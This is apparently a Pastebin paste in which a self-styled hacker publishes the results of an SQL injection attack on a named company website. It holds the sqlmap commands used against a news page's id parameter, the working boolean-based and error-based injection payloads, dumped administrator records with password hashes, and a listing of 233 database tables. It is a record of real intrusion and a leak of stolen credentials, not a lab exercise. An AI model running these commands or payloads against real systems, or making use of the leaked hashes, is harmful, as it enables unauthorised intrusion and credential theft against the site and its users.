Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Greeting to saudi team ;)
- Published by JM511 ;0
- Twitter.com/JM511
- bbm;21EB3DBB
- =============
- http://www.brandshelter.com/en/
- Database: db_wy2c75fus9
- Table: users
- [1 entry]
- +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
- | active | email | groupID | name | password | url | userID | username |
- +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
- | y | [email protected] | 1 | New User | d7cf95a11a90b97a121335fda1964e61787010d1 | NULL | 1 | admin |
- +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
- [23:37:35] [INFO] Table 'db_wy2c75fus9.users' dumped to CSV file '/home/jm511/.sqlmap/output/brandshelter.com/dump/db_wy2c75fus9/users.csv'
- [23:37:35] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/brandshelter.com'
- [*] shutting down at: 23:37:35
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://brandshelter.com/en/news/news.php?id=181 -D db_wy2c75fus9 -T wp-users --dump
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 01:06:20
- [01:06:20] [INFO] using '/home/jm511/.sqlmap/output/brandshelter.com/session' as session file
- [01:06:20] [INFO] resuming injection data from session file
- [01:06:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- [01:06:20] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=181 AND 7622=7622
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=181 AND (SELECT 7817 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,122,119,58),(SELECT (CASE WHEN (7817=7817) THEN 1 ELSE 0 END)),CHAR(58,99,112,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- ---
- [01:06:21] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL 5.0
- [01:06:21] [INFO] fetching columns for table '`wp-users`' on database 'db_wy2c75fus9'
- [01:06:21] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
- [01:06:22] [WARNING] unable to retrieve column names
- [01:06:22] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/brandshelter.com'
- [*] shutting down at: 01:06:22
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://brandshelter.com/en/news/news.php?id=181 -D db_wy2c75fus9 -T wp_users --dump
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 01:06:30
- [01:06:30] [INFO] using '/home/jm511/.sqlmap/output/brandshelter.com/session' as session file
- [01:06:30] [INFO] resuming injection data from session file
- [01:06:30] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- [01:06:30] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=181 AND 7622=7622
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=181 AND (SELECT 7817 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,122,119,58),(SELECT (CASE WHEN (7817=7817) THEN 1 ELSE 0 END)),CHAR(58,99,112,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- ---
- [01:06:30] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL 5.0
- [01:06:30] [INFO] fetching columns for table 'wp_users' on database 'db_wy2c75fus9'
- [01:06:31] [INFO] the SQL query used returns 10 entries
- [01:06:31] [INFO] retrieved: ID
- [01:06:32] [INFO] retrieved: bigint(20) unsigned
- [01:06:32] [INFO] retrieved: user_login
- [01:06:33] [INFO] retrieved: varchar(60)
- [01:06:33] [INFO] retrieved: user_pass
- [01:06:33] [INFO] retrieved: varchar(64)
- [01:06:34] [INFO] retrieved: user_nicename
- [01:06:34] [INFO] retrieved: varchar(50)
- [01:06:35] [INFO] retrieved: user_email
- [01:06:35] [INFO] retrieved: varchar(100)
- [01:06:35] [INFO] retrieved: user_url
- [01:06:36] [INFO] retrieved: varchar(100)
- [01:06:38] [INFO] retrieved: user_registered
- [01:06:38] [INFO] retrieved: datetime
- [01:06:38] [INFO] retrieved: user_activation_key
- [01:06:39] [INFO] retrieved: varchar(60)
- [01:06:39] [INFO] retrieved: user_status
- [01:06:40] [INFO] retrieved: int(11)
- [01:06:41] [INFO] retrieved: display_name
- [01:06:42] [INFO] retrieved: varchar(250)
- [01:06:42] [INFO] fetching entries for table 'wp_users' on database 'db_wy2c75fus9'
- [01:06:42] [INFO] the SQL query used returns 1 entries
- [01:06:43] [INFO] retrieved: 0
- [01:06:43] [INFO] retrieved: Jensemann
- [01:06:44] [INFO] retrieved: Jensemann
- [01:06:45] [INFO] retrieved: jensemann
- [01:06:45] [INFO] retrieved: 2010-08-19 10:07:50
- [01:06:46] [INFO] retrieved: $P$BxyBuOTOwvfyfXWkfMF/7mZ1akv3MS1
- [01:06:46] [INFO] retrieved: 1
- [01:06:46] [INFO] retrieved: [email protected]
- Database: db_wy2c75fus9
- Table: wp_users
- [1 entry]
- +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
- | display_name | ID | user_activation_key | user_email | user_login | user_nicename | user_pass | user_registered | user_status | user_url |
- +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
- | Jensemann | 1 | None | [email protected] | Jensemann | jensemann | $P$BxyBuOTOwvfyfXWkfMF/7mZ1akv3MS1 | 2010-08-19 10:07:50 | 0 | None |
- +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
- Database: db_wy2c75fus9
- [233 tables]
- +------------------------------------+
- | EB3categories |
- | EB3comments |
- | EB3menu_links |
- | EB3options |
- | EB3posts |
- | EB3users |
- | EB3users_groups |
- | EB3users_groups2permissions |
- | EB3users_permissions |
- | articles |
- | articles_en |
- | be_groups |
- | be_sessions |
- | be_users |
- | brand_comments |
- | brand_icl_content_status |
- | brand_icl_core_status |
- | brand_icl_flags |
- | brand_icl_languages |
- | brand_icl_languages_translations |
- | brand_icl_locale_map |
- | brand_icl_node |
- | brand_icl_plugins_texts |
- | brand_icl_string_status |
- | brand_icl_string_translations |
- | brand_icl_strings |
- | brand_icl_translations |
- | brand_links |
- | brand_options |
- | brand_postmeta |
- | brand_posts |
- | brand_term_relationships |
- | brand_term_taxonomy |
- | brand_terms |
- | brand_usermeta |
- | brand_users |
- | brandshelter_authors |
- | brandshelter_news_de |
- | brandshelter_news_en |
- | brandshelter_news_status |
- | cache_extensions |
- | cache_hash |
- | cache_imagesizes |
- | cache_md5params |
- | cache_pages |
- | cache_pagesection |
- | cache_typo3temp_log |
- | calendar_event |
- | calendar_users |
- | categories |
- | comments |
- | dotsaar_ak_popularity |
- | dotsaar_ak_popularity_options |
- | dotsaar_cat_visibility |
- | dotsaar_comments |
- | dotsaar_icl_content_status |
- | dotsaar_icl_core_status |
- | dotsaar_icl_flags |
- | dotsaar_icl_languages |
- | dotsaar_icl_languages_translations |
- | dotsaar_icl_locale_map |
- | dotsaar_icl_node |
- | dotsaar_icl_plugins_texts |
- | dotsaar_icl_string_status |
- | dotsaar_icl_string_translations |
- | dotsaar_icl_strings |
- | dotsaar_icl_translations |
- | dotsaar_leaguemanager_leagues |
- | dotsaar_leaguemanager_matches |
- | dotsaar_leaguemanager_stats |
- | dotsaar_leaguemanager_teams |
- | dotsaar_links |
- | dotsaar_ngg_album |
- | dotsaar_ngg_gallery |
- | dotsaar_ngg_pictures |
- | dotsaar_options |
- | dotsaar_postmeta |
- | dotsaar_posts |
- | dotsaar_term_relationships |
- | dotsaar_term_taxonomy |
- | dotsaar_terms |
- | dotsaar_usermeta |
- | dotsaar_users |
- | dotsaar_wp125_ads |
- | ebl_categories |
- | ebl_comments |
- | ebl_menu_links |
- | ebl_posts |
- | ebl_users |
- | ebl_users_ip |
- | fe_groups |
- | fe_session_data |
- | fe_sessions |
- | fe_users |
- | index_config |
- | index_debug |
- | index_fulltext |
- | index_grlist |
- | index_phash |
- | index_rel |
- | index_section |
- | index_stat_search |
- | index_stat_word |
- | index_words |
- | ks_nav_home |
- | menu_links |
- | options |
- | optionscategories |
- | optionscomments |
- | optionsmenu_links |
- | optionsoptions |
- | optionsposts |
- | optionsusers |
- | optionsusers_groups |
- | optionsusers_groups2permissions |
- | optionsusers_permissions |
- | pages |
- | pages_language_overlay |
- | phpbb_acl_groups |
- | phpbb_acl_options |
- | phpbb_acl_roles |
- | phpbb_acl_roles_data |
- | phpbb_acl_users |
- | phpbb_attachments |
- | phpbb_banlist |
- | phpbb_bbcodes |
- | phpbb_bookmarks |
- | phpbb_bots |
- | phpbb_config |
- | phpbb_confirm |
- | phpbb_disallow |
- | phpbb_drafts |
- | phpbb_extension_groups |
- | phpbb_extensions |
- | phpbb_forums |
- | phpbb_forums_access |
- | phpbb_forums_track |
- | phpbb_forums_watch |
- | phpbb_groups |
- | phpbb_icons |
- | phpbb_lang |
- | phpbb_log |
- | phpbb_moderator_cache |
- | phpbb_modules |
- | phpbb_poll_options |
- | phpbb_poll_votes |
- | phpbb_posts |
- | phpbb_privmsgs |
- | phpbb_privmsgs_folder |
- | phpbb_privmsgs_rules |
- | phpbb_privmsgs_to |
- | phpbb_profile_fields |
- | phpbb_profile_fields_data |
- | phpbb_profile_fields_lang |
- | phpbb_profile_lang |
- | phpbb_ranks |
- | phpbb_reports |
- | phpbb_reports_reasons |
- | phpbb_search_results |
- | phpbb_search_wordlist |
- | phpbb_search_wordmatch |
- | phpbb_sessions |
- | phpbb_sessions_keys |
- | phpbb_sitelist |
- | phpbb_smilies |
- | phpbb_styles |
- | phpbb_styles_imageset |
- | phpbb_styles_imageset_data |
- | phpbb_styles_template |
- | phpbb_styles_template_data |
- | phpbb_styles_theme |
- | phpbb_topics |
- | phpbb_topics_posted |
- | phpbb_topics_track |
- | phpbb_topics_watch |
- | phpbb_user_group |
- | phpbb_users |
- | phpbb_warnings |
- | phpbb_words |
- | phpbb_zebra |
- | posts |
- | static_countries |
- | static_country_zones |
- | static_currencies |
- | static_languages |
- | static_markets |
- | static_template |
- | static_territories |
- | static_tsconfig_help |
- | sys_action |
- | sys_action_asgr_mm |
- | sys_be_shortcuts |
- | sys_domain |
- | sys_filemounts |
- | sys_history |
- | sys_language |
- | sys_lockedrecords |
- | sys_log |
- | sys_note |
- | sys_preview |
- | sys_refindex |
- | sys_refindex_rel |
- | sys_refindex_res |
- | sys_refindex_words |
- | sys_template |
- | sys_workspace |
- | tt_content |
- | tt_news |
- | tt_news_cat |
- | tt_news_cat_mm |
- | tt_news_related_mm |
- | tx_impexp_presets |
- | tx_rtehtmlarea_acronym |
- | tx_staticinfotables_hotlist |
- | tx_templavoila_datastructure |
- | tx_templavoila_tmplobj |
- | users |
- | users_groups |
- | users_groups2permissions |
- | users_permissions |
- | vote2 |
- | voted2 |
- | wp_commentmeta |
- | wp_comments |
- | wp_links |
- | wp_options |
- | wp_postmeta |
- | wp_posts |
- | wp_term_relationships |
- | wp_term_taxonomy |
- | wp_terms |
- | wp_usermeta |
- | wp_users |
- +------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement